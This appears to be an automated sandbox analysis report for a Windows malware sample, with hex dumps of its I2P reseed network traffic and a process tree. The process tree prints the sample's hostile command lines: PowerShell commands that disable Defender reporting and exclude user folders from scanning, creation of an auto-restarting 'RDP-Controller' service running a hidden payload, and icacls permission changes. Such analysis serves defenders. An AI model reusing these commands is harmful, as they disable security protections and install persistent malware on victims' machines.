                2025-01-01 17:10:17 UTC4096INData Raw: 07 18 31 94 b3 64 e4 17 97 d8 f2 19 19 18 e8 19 9a 9b ea 99 5b ea 19 9a 9a 5b 33 66 da 4a e4 1b 96 7b 5b 9a eb 56 44 ba 19 95 98 54 98 98 94 56 79 e7 15 3b da da 5a b3 14 e4 17 95 d8 b2 1a 5b 9a 59 58 58 33 16 db ea 14 9b 26 87 58 7a 05 05 87 98 f8 e4 86 17 95 84 66 38 e5 25 59 f8 a6 85 79 3b 9b 66 9b a4 5b 04 d4 d5 65 14 fa 15 14 57 65 e7 94 db 5a 33 96 d9 32 1a 59 73 c0 dc c1 12 1c 1c 6a c4 30 85 25 39 b1 a0 d8 96 d1 d9 1a a7 7b 74 f2 0b d2 7d fc 33 8a ca cb 13 3d 2d eb b2 f3 fd f3 72 4c 2b cd 8b d2 2d f3 cc 33 cd 5c 7d ca 1c bd fc 73 53 4d aa 0c bd c3 0c 8b b1 b8 d1 c3 c3 35 3f ca 25 aa 40 37 3d d2 25 25 33 c8 24 d7 b3 b0 2c d4 3b df b1 24 c7 d0 d3 dc b4 38 dd d8 39 33 2f 35 c4 dc dc b5 22 1f e6 46 06 06 1d 88 b3 98 02 82 ac 59 f3 52 4b 3c 53 40 c2 7c
                Data Ascii: 1d[[3fJ{[VDTVy;Z[YXX3&Xzf8%Yy;f[eWeZ32Ysj0%9{t}3=-rL+-3\}sSM5?%@7=%%3$,;$893/5"FYRK<S@|
                2025-01-01 17:10:17 UTC4096INData Raw: 9e c5 41 93 77 ce 48 b7 3b ae 35 75 23 5f e0 d2 35 06 26 b6 17 6a dc 0e 31 72 67 5d ff f0 3b c5 73 c2 a8 3c 7e 79 a5 f5 57 b9 e6 b7 ef 58 b0 c1 31 74 f2 b7 35 13 ee cc 4d e7 15 f2 7a 24 d6 34 c1 e0 ca bf c9 69 0b 8f b2 32 b0 30 b0 33 b0 30 30 30 4e 51 fc 67 f2 8e 85 99 01 0a 58 fd 42 9c 03 8c 18 4a 59 32 f2 8b 4b 6c 79 8c 2d f4 4c 0c f4 2c 4d f4 8c 4c 0d ad 19 33 6d 25 dc 2c 33 1c 43 1d 8b f2 bd 42 0a 2b bc 0c d3 72 dd 8c 4c bd 5c cb 6d 6d ad 59 0a f2 8b 4a 6c 59 8d 2c 2c cd cd ac 19 8b 6d 75 22 4b 7d 8b fc c2 ca 8b 22 83 82 3c 73 0b 8d d3 dc 93 fc 33 83 cc 1c c3 8a 4d 33 8a 52 43 b2 23 cd 02 23 cd 13 1d 1d 83 8a 32 42 6d ad 19 cb 6c 19 8d ac d1 5d e1 c0 92 9c 58 50 6c cb 48 b6 81 1c 30 03 59 82 83 43 8d 18 26 43 cc 63 72 72 b6 c6 e1 3f 1d 8b 8c 64 3f 73
                Data Ascii: AwH;5u#_5&j1rg];s<~yWX1t5Mz$4i203000NQgXBJY2Kly-L,ML3m%,3CB+rL\mmYJlY,,mu"K}"<s3M3RC##2Bml]XPlH0YC&Ccrr?d?s
                2025-01-01 17:10:17 UTC4096INData Raw: 9e 4b 61 00 04 00 00 ff ff 50 4b 07 08 84 85 c3 34 0c 02 00 00 61 03 00 00 50 4b 03 04 14 00 08 08 08 00 55 56 21 5a 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 4e 5a 6d 64 51 33 65 67 67 4c 6d 54 58 70 61 68 57 35 41 36 75 75 67 62 51 65 7e 74 79 57 53 44 39 37 50 70 74 46 79 55 64 31 45 3d 2e 64 61 74 55 54 05 00 01 03 1e 75 67 b2 15 9b 6e ec df 78 f4 ca 91 74 66 b7 9b 39 4b 03 f4 03 44 3f 3d 52 08 74 5d f6 9b 29 2f e4 a8 69 09 c3 1a 8d 2f c9 77 53 4c 1b 27 16 5f bc 7b d5 ea 5d eb f3 ed 33 eb 1e bd e4 7f fe ce 83 b1 ca 81 c9 77 54 1e bf bc a0 d6 b7 0d d5 bb 38 93 ef ff dc 59 c9 2f 27 b3 e6 8e db 3b 63 b3 5d 33 d9 04 ce d9 4f 36 9b 71 cc 9d 95 81 85 81 9d 81 85 81 81 71 8a 62 ad dd 02 16 66 06 28 60 f5 0b 71 0e 30 62
                Data Ascii: KaPK4aPKUV!Z;routerInfo-NZmdQ3eggLmTXpahW5A6uugbQe~tyWSD97PptFyUd1E=.datUTugnxtf9KD?=Rt])/i/wSL'_{]3wT8Y/';c]3O6qqbf(`q0b
                2025-01-01 17:10:17 UTC4096INData Raw: aa d0 dc ea f5 f1 5e 6a cb e6 2f d2 d2 6b 0f 2d 2b df 59 6f f4 29 81 53 27 78 ef de 4b 81 42 17 54 0f bd 5b c3 9d 76 22 92 73 4f cd ff eb 4a 9b 33 ce 73 fc 3d 3b 31 dd 6c cf ef de e8 3a f6 65 4b 33 75 56 5d ad e2 9b f2 c6 5e e6 df 8e bd 8f 1d 38 4c 02 79 af 75 e6 35 19 ff d9 7c 2c 33 24 eb 6a f9 a3 6b aa d6 df 63 36 3b 7c 0d 13 8b 9d b4 38 fe d8 a7 1a 63 ff b3 71 22 87 9a 2e 2a df 7c bd c1 c3 a7 62 55 d7 ce 33 f7 f8 3f b5 98 1e eb 5a 2c de 23 ba 80 99 41 a0 ca f5 83 f5 8b 85 ab b6 bf 29 e3 c9 09 2f e0 7c b9 43 7a 8d 93 47 52 fb 89 7d 72 42 ef 97 e8 1c 6d 0a eb e2 0d 9e f2 9c d7 a6 4f 49 51 9d ad 9d 51 ce b0 41 a3 3b fa fa ce 48 a3 62 b1 15 ff f5 58 19 58 18 d8 19 58 18 18 18 a7 28 4e 4c aa 60 62 65 80 02 96 e0 e0 50 23 86 49 2c c9 89 05 c5 b6 8c 4e d6 2c
                Data Ascii: ^j/k-+Yo)S'xKBT[v"sOJ3s=;1l:eK3uV]^8Lyu5|,3$jkc6;|8cq".*|bU3?Z,#A)/|CzGR}rBmOIQQA;HbXXX(NL`beP#I,N,
                2025-01-01 17:10:17 UTC4096INData Raw: 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 6b 6e 41 73 67 68 61 7a 35 55 75 70 59 31 35 44 54 5a 42 47 36 74 50 57 68 7a 6e 48 4a 44 42 70 54 6f 52 4e 4b 5a 4f 2d 76 52 59 3d 2e 64 61 74 55 54 05 00 01 a2 42 75 67 b2 5b f6 d2 a8 ee e7 fa e2 4b 2f 97 86 ca b7 47 cd be da b4 e6 73 e3 7f 0e 49 b6 a6 ce 73 e5 fa 0b 92 ab 3a eb a6 4b cc 75 e4 ff ee ae 29 ba 75 d9 33 11 d9 a5 25 fe c9 31 37 e3 f7 fd db ba e7 4f 8a b1 d5 a8 3c 7e f9 b5 73 35 17 b1 a6 bb 5d c8 3e b0 e9 ce 43 bf ca 0d e7 a6 25 f6 8a 3f 97 4c fe 57 ea a6 a4 ed b4 41 80 95 81 85 81 9d 81 85 81 81 71 8a 12 8f e7 5a 26 66 06 28 60 f5 0b 71 0e 30 62 28 67 c9 c8 2f 2e b1 e5 b3 34 d6 33 34 35 d7 33 32 b1 d0 33 b4 30 b3 66 cc b4 95 08 c9 f7 f7 4d b6 2c 32 49 0b cb ca 4a 2a cc b5
                Data Ascii: ;routerInfo-knAsghaz5UupY15DTZBG6tPWhznHJDBpToRNKZO-vRY=.datUTBug[K/GsIs:Ku)u3%17O<~s5]>C%?LWAqZ&f(`q0b(g/.43453230fM,2IJ*
                2025-01-01 17:10:17 UTC4096INData Raw: 49 50 72 50 72 47 7e 77 55 32 77 6e 41 57 35 4c 4e 32 30 75 46 76 45 75 6f 30 74 67 58 6b 66 50 56 34 57 5a 75 52 32 71 73 3d 2e 64 61 74 55 54 05 00 01 f0 3f 75 67 f2 a8 d7 14 3a f2 77 e9 c1 1f c7 6e 86 b0 8a e8 86 dd fd ce 5a 7f 27 2c 40 75 59 d5 2f ae 74 8e ad c9 f9 df bf 48 3f b8 11 7c d1 9c e7 e9 75 f9 95 d6 46 1a d9 5b d7 b9 1f fa 7d a9 e1 f5 fd 84 c5 47 6d 78 47 e5 f1 cb 2f 09 ed ee ee 5a ed 7d f7 93 d4 e6 2c 55 df 13 3b fc de b2 d5 f8 6b ba 68 ce 2b 09 3d ed 5f f7 b3 92 95 81 85 81 9d 81 85 81 81 71 8a 12 e3 21 61 26 66 06 28 60 f5 0b 71 0e 30 62 a8 60 c9 c8 2f 2e b1 e5 37 b4 b0 d0 33 32 34 d2 33 04 61 13 43 6b c6 4c 5b 09 ef 50 dd 80 4c b7 b0 e0 f0 cc 32 27 d7 30 b3 44 cb aa 80 bc b4 72 5b 5b 6b 96 82 fc a2 12 5b 56 23 33 63 03 53 6b c6 62 5b 9d
                Data Ascii: IPrPrG~wU2wnAW5LN20uFvEuo0tgXkfPV4WZuR2qs=.datUT?ug:wnZ',@uY/tH?|uF[}GmxG/Z},U;kh+=_q!a&f(`q0b`/.73243aCkL[PL2'0Dr[[k[V#3cSkb[
                2025-01-01 17:10:17 UTC4096INData Raw: 38 41 76 4d 52 47 6f 32 69 70 38 68 32 75 37 4e 37 67 69 6c 5a 71 52 36 6f 56 6c 34 73 68 31 67 3d 2e 64 61 74 55 54 05 00 01 1d 28 75 67 5a b1 ab 47 b4 ff 43 26 e7 ae 15 9f b8 82 b7 15 69 6d cd 5e 28 b9 9c ff d6 8e 8b 4b 2a 7f 9a 1b 06 a9 5a ff d3 4a 73 ee 6f ed eb 3e 12 7c b0 ef 42 66 ff 5b d9 60 51 d3 65 3e d7 bb c3 b9 18 96 2b ad f2 1b 95 c7 2f af 20 20 ee 19 b6 5c 5a 35 32 55 a5 cf 91 91 6b c5 e1 1b 69 12 aa 1c 32 fc 95 0f 37 4d 4f ea 7b e2 c1 ca c0 c2 c0 ce c0 c2 c0 c0 38 45 71 c9 e6 53 4c cc 0c 50 c0 ea 17 e2 1c 60 c4 50 c6 92 91 5f 5c 62 cb 6b 61 a8 67 68 66 a1 67 61 ac 67 64 60 68 cd 98 69 2b 11 56 98 16 e9 69 ea 56 95 94 99 a7 9b 62 56 e6 e2 e4 97 99 1b e1 68 6b 6b cd 52 90 5f 54 62 cb 6a 68 61 64 69 60 cd 58 6c ab e3 e1 6a 5e 18 65 10 1c 15 e5
                Data Ascii: 8AvMRGo2ip8h2u7N7gilZqR6oVl4sh1g=.datUT(ugZGC&im^(K*ZJso>|Bf[`Qe>+/ \Z52Uki27MO{8EqSLP`P_\bkaghfgagd`hi+ViVbVhkkR_Tbjhadi`Xlj^e


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.44997380.74.145.704436764C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                TimestampBytes transferredDirectionData
                2025-01-01 17:11:29 UTC106OUTGET https://reseed.diva.exchange:443/i2pseeds.su3 HTTP/1.0
                User-Agent: Wget/1.11.4
                Connection: close
                2025-01-01 17:11:29 UTC406INHTTP/1.1 200 OK
                Server: nginx
                Date: Wed, 01 Jan 2025 17:11:29 GMT
                Content-Type: application/octet-stream
                Content-Length: 70446
                Connection: close
                Content-Disposition: attachment; filename=i2pseeds.su3
                Strict-Transport-Security: max-age=63072000; includeSubdomains
                X-Content-Type-Options: nosniff
                Onion-Location: http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3
                2025-01-01 17:11:29 UTC15978INData Raw: 49 32 50 73 75 33 00 00 00 06 02 00 00 10 00 14 00 00 00 00 00 01 10 e2 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 31 37 33 35 37 32 39 39 39 33 00 00 00 00 00 00 72 65 73 65 65 64 40 64 69 76 61 2e 65 78 63 68 61 6e 67 65 50 4b 03 04 14 00 08 08 08 00 28 59 21 5a 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 4f 4a 51 4a 76 49 34 59 32 6d 6c 76 58 70 78 78 78 56 51 37 30 6d 5a 73 7e 70 41 7e 75 39 4e 35 72 2d 49 37 4f 68 4d 66 77 62 38 3d 2e 64 61 74 55 54 05 00 01 5c 22 75 67 fa 1d f4 c7 94 85 f1 ab fc b5 d8 0f 3b 53 1c 05 2f f1 1c fd f8 71 ef 65 a3 4a ce c5 39 a7 78 4e 2a 1a 72 dc cb 0d f8 2b 1d ce 2e a0 14 1a 2e 33 d7 71 eb ae 9a 1b 5f 0a dc cf 08 31 3d bf bf 93 a5 b3 36 73 54 1e bf bc d2 15 0d f9 94 a8 2b be 67
                Data Ascii: I2Psu31735729993reseed@diva.exchangePK(Y!Z;routerInfo-OJQJvI4Y2mlvXpxxxVQ70mZs~pA~u9N5r-I7OhMfwb8=.datUT\"ug;S/qeJ9xN*r+..3q_1=6sT+g
                2025-01-01 17:11:29 UTC16384INData Raw: 81 85 81 81 71 8a 62 d5 b2 5f 4c cc 0c 50 c0 ea 17 e2 1c 60 c4 50 ce 92 91 5f 5c 62 cb 67 68 64 a0 67 64 a6 67 64 68 a1 67 68 6c 62 cd 98 69 2b 91 1e 58 9c 66 9a 65 e9 19 e2 57 64 ea 1a 6c 64 59 55 61 92 96 14 68 6b 6b cd 52 90 5f 54 62 cb 6a 68 68 61 6a 66 cd 58 6c ab e3 16 50 91 e9 e8 94 6a 5a e4 51 a5 5b ea 1c 65 52 68 ee 57 55 51 e1 98 12 18 e0 64 5a e2 93 e7 5f 66 58 55 96 e9 ec 5b 6e 19 6a 61 6b cd 58 66 cb 68 64 cd 01 73 07 4b 70 70 a8 11 c3 54 96 e4 c4 82 62 5b 26 27 67 6b 9c 0e d2 09 b1 0c f6 75 f2 f5 f3 f5 f6 0a 29 4b 35 4a 77 f1 30 8f 30 0a 2b 70 b6 08 0e 33 72 34 8e 70 2c 89 32 0e b2 0c af f0 32 0f 8a 0c c5 e2 c8 2c 8b 08 e3 64 23 8b 2c af 34 5f 7f 03 93 e0 aa ba 74 f7 0c c7 54 13 cf 90 ec d4 d2 b0 02 dd 7c cb 80 b2 cc b0 14 c3 08 b7 74 03 98
                Data Ascii: qb_LP`P_\bghdgdgdhghlbi+XfeWdldYUahkkR_TbjhhajfXlPjZQ[eRhWUQdZ_fXU[njakXfhdsKppTb[&'gku)K5Jw00+p3r4p,22,d#,4_tT|t
                2025-01-01 17:11:29 UTC16384INData Raw: 3d 25 58 22 1f 65 ea 62 be 5b 51 7d 22 05 46 24 00 a5 a3 7f a9 f1 18 dd a8 0f 5c 12 c0 37 1b 78 eb f5 40 5a 55 4b 90 da 99 e7 2d ac c8 d2 3f 0d 18 e2 dc 5a 62 8a a6 42 12 99 65 d8 2c f4 7b 13 c3 ef c6 79 bf 51 15 0d b7 ea a8 cc 4a b7 97 d7 40 73 38 49 ff cd d0 5e 3e b3 86 6a 4a b5 d9 2f 8e fa c9 dc 78 a2 8f cb 76 2e 9e 02 b1 89 cc 17 e2 51 91 2f b5 b4 35 d1 10 fa ee f5 8e 77 fc a9 e3 82 70 30 f3 7f 6d 13 34 f5 f1 80 21 4b 80 67 39 9e 65 79 5e 98 23 70 80 30 3f 47 f0 06 12 00 9c 23 f6 00 31 dc 1c a1 1b 48 14 b1 b4 68 b6 19 12 ca 27 6a 85 74 02 f6 93 82 53 e4 ca 9a a0 24 e4 12 ab 74 87 13 98 f7 95 c4 d4 8e b1 e3 68 df 58 37 54 d5 25 fb 16 40 42 cd b1 eb b5 b5 b8 b3 91 5c b3 92 69 91 5f af 6c b1 cc 46 d6 0c 8f b0 20 37 50 b4 a3 c8 e6 ca b4 92 b2 0b f6 cc 02
                Data Ascii: =%X"eb[Q}"F$\7x@ZUK-?ZbBe,{yQJ@s8I^>jJ/xv.Q/5wp0m4!Kg9ey^#p0?G#1Hh'jtS$thX7T%@B\i_lF 7P
                2025-01-01 17:11:29 UTC16384INData Raw: 08 72 35 f6 b5 48 73 ca cb 0d 2b 76 ac f3 cb 28 8c 32 4a ae f0 77 f2 f0 34 33 0d 4b c6 e1 c4 42 84 97 49 75 0d 99 0e 60 60 48 81 d8 c9 12 91 16 e4 62 cd 9a 97 5a e2 99 02 92 10 c9 4b 2d 49 49 d2 cb ce cb 2f cf f3 49 4d 2c 4e 0d 4e 2d 29 b6 65 36 31 32 b7 16 42 92 0a ca 2f 2d 49 2d 2a 06 05 83 b9 99 a9 35 5f 11 98 af 57 96 5a 54 9c 99 9f 67 cb 66 a0 67 a9 67 66 6c fd 3c 6d df a5 27 73 15 6f 3c ac 9f 35 a5 7d fd da f7 4a 95 fb dc ac 57 da 85 2e de 7e 6a b2 72 dc b4 a4 b3 3c a7 d3 85 fc 58 5d ce 1e 4f 4a be 6c a8 27 2a 2c b4 da f2 8b 50 eb b2 15 ee ba f1 02 1a 2b 38 00 01 00 00 ff ff 50 4b 07 08 95 46 b7 48 1d 02 00 00 32 04 00 00 50 4b 03 04 14 00 08 08 08 00 87 58 21 5a 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 79 44
                Data Ascii: r5Hs+v(2Jw43KBIu``HbZK-II/IM,NN-)e612B/-I-*5_WZTgfggfl<m'so<5}JW.~jr<X]OJl'*,P+8PKFH2PKX!Z;routerInfo-yD
                2025-01-01 17:11:29 UTC5316INData Raw: 14 00 08 08 08 00 87 58 21 5a a9 9c 88 28 0a 02 00 00 5f 03 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 b3 6c 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 62 68 74 77 71 6d 6a 4c 46 7e 36 73 47 61 63 36 51 55 7a 31 6f 43 42 32 70 77 65 76 79 71 33 34 4f 62 38 6d 6c 7e 4c 4a 6d 34 6f 3d 2e 64 61 74 55 54 05 00 01 2e 21 75 67 50 4b 01 02 14 00 14 00 08 00 08 00 c7 58 21 5a ea ac eb 66 df 01 00 00 27 03 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 2f 6f 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 71 58 75 39 5a 42 55 4b 4b 57 48 74 45 34 47 34 78 79 74 63 5a 37 6a 72 64 57 73 4f 32 56 6f 72 32 51 43 39 6a 55 61 64 50 72 6f 3d 2e 64 61 74 55 54 05 00 01 a7 21 75 67 50 4b 01 02 14 00 14 00 08 00 08 00 87 58 21 5a f3 56 9c d0 0b 03 00 00 2c 03 00 00 3b 00 09 00 00
                Data Ascii: X!Z(_;lrouterInfo-bhtwqmjLF~6sGac6QUz1oCB2pwevyq34Ob8ml~LJm4o=.datUT.!ugPKX!Zf';/orouterInfo-qXu9ZBUKKWHtE4G4xytcZ7jrdWsO2Vor2QC9jUadPro=.datUT!ugPKX!ZV,;


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:12:09:54
                Start date:01/01/2025
                Path:C:\Users\user\Desktop\DF2.exe
                Wow64 process (32bit):false
                Commandline:"C:\Users\user\Desktop\DF2.exe"
                Imagebase:0x400000
                File size:8'630'784 bytes
                MD5 hash:9B41D60958D07CDFD3CBC58FBB56CEA7
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:Borland Delphi
                Reputation:low
                Has exited:true

                Target ID:1
                Start time:12:09:54
                Start date:01/01/2025
                Path:C:\Users\user\Desktop\DF2.exe
                Wow64 process (32bit):false
                Commandline:C:\Users\user\Desktop\DF2.exe
                Imagebase:0x400000
                File size:8'630'784 bytes
                MD5 hash:9B41D60958D07CDFD3CBC58FBB56CEA7
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:Borland Delphi
                Reputation:low
                Has exited:false

                Target ID:2
                Start time:12:09:58
                Start date:01/01/2025
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\4zy7r31p1gb90h9v8yoiitu76a64kr0m.bat"
                Imagebase:0x7ff621a90000
                File size:289'792 bytes
                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:3
                Start time:12:09:58
                Start date:01/01/2025
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7699e0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:4
                Start time:12:09:58
                Start date:01/01/2025
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
                Imagebase:0x7ff788560000
                File size:452'608 bytes
                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:5
                Start time:12:09:58
                Start date:01/01/2025
                Path:C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe
                Wow64 process (32bit):false
                Commandline:"C:\Users\user\AppData\Local\Temp\w8m7wmyk939oczmkw4o2h16hs.exe"
                Imagebase:0x7ff764cc0000
                File size:98'304 bytes
                MD5 hash:319865D78CC8DF6270E27521B8182BFF
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Antivirus matches:
                • Detection: 100%, Avira
                • Detection: 58%, ReversingLabs
                Reputation:low
                Has exited:true

                Target ID:7
                Start time:12:10:01
                Start date:01/01/2025
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
                Imagebase:0x7ff788560000
                File size:452'608 bytes
                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:8
                Start time:12:10:03
                Start date:01/01/2025
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
                Imagebase:0x7ff788560000
                File size:452'608 bytes
                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:10
                Start time:12:10:11
                Start date:01/01/2025
                Path:C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe
                Wow64 process (32bit):false
                Commandline:"C:\Users\user\AppData\Local\Temp\nju2apmx83wqd9u7namsf59y.exe"
                Imagebase:0x7ff679a50000
                File size:10'669'056 bytes
                MD5 hash:2F829F1CB631D234C54F2E6C6F72EB57
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Antivirus matches:
                • Detection: 100%, Joe Sandbox ML
                • Detection: 70%, ReversingLabs
                Reputation:low
                Has exited:true

                Target ID:11
                Start time:12:10:14
                Start date:01/01/2025
                Path:C:\Windows\System32\taskkill.exe
                Wow64 process (32bit):false
                Commandline:taskkill.exe /F /FI "SERVICES eq RDP-Controller"
                Imagebase:0x7ff6eee10000
                File size:101'376 bytes
                MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate
                Has exited:true

                Target ID:12
                Start time:12:10:14
                Start date:01/01/2025
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7699e0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:13
                Start time:12:10:14
                Start date:01/01/2025
                Path:C:\Windows\System32\sc.exe
                Wow64 process (32bit):false
                Commandline:sc.exe stop RDP-Controller
                Imagebase:0x7ff6f2a60000
                File size:72'192 bytes
                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:14
                Start time:12:10:14
                Start date:01/01/2025
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7699e0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:15
                Start time:12:10:14
                Start date:01/01/2025
                Path:C:\Windows\System32\sc.exe
                Wow64 process (32bit):false
                Commandline:sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
                Imagebase:0x7ff6f2a60000
                File size:72'192 bytes
                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:16
                Start time:12:10:14
                Start date:01/01/2025
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7699e0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:17
                Start time:12:10:14
                Start date:01/01/2025
                Path:C:\Windows\System32\sc.exe
                Wow64 process (32bit):false
                Commandline:sc.exe failure RDP-Controller reset= 1 actions= restart/10000
                Imagebase:0x7ff6f2a60000
                File size:72'192 bytes
                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:18
                Start time:12:10:14
                Start date:01/01/2025
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7699e0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:19
                Start time:12:10:14
                Start date:01/01/2025
                Path:C:\Windows\System32\sc.exe
                Wow64 process (32bit):false
                Commandline:sc.exe start RDP-Controller
                Imagebase:0x7ff6f2a60000
                File size:72'192 bytes
                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:20
                Start time:12:10:14
                Start date:01/01/2025
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7699e0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:21
                Start time:12:10:15
                Start date:01/01/2025
                Path:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                Wow64 process (32bit):false
                Commandline:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                Imagebase:0x7ff76a900000
                File size:89'088 bytes
                MD5 hash:BB070CFBD23A7BC6F2A0F8F6D167D207
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Antivirus matches:
                • Detection: 70%, ReversingLabs
                Has exited:true

                Target ID:22
                Start time:12:10:15
                Start date:01/01/2025
                Path:C:\Windows\System32\icacls.exe
                Wow64 process (32bit):false
                Commandline:icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
                Imagebase:0x7ff70f7d0000
                File size:39'424 bytes
                MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:23
                Start time:12:10:15
                Start date:01/01/2025
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7699e0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:24
                Start time:12:10:15
                Start date:01/01/2025
                Path:C:\Windows\System32\icacls.exe
                Wow64 process (32bit):false
                Commandline:icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\npX5adYEH7eu.acl
                Imagebase:0x7ff70f7d0000
                File size:39'424 bytes
                MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                Target ID:25
                Start time:12:10:15
                Start date:01/01/2025
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7699e0000
                File size:862'208 bytes
